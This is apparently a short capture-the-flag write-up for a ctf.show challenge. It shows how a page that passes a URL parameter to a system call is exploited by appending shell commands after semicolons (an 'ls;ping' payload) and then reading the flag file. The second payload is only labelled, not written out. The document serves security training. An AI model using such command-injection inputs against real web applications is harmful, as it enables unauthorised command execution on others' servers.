Open drone
View Page Info
We can see there is a system function
Can be used in Linux ";" isolate different statements
payload follows
https://5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show/?url=5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show;ls;ping www
Use the same method to view the contents of the file flag
payload
Successfully got flag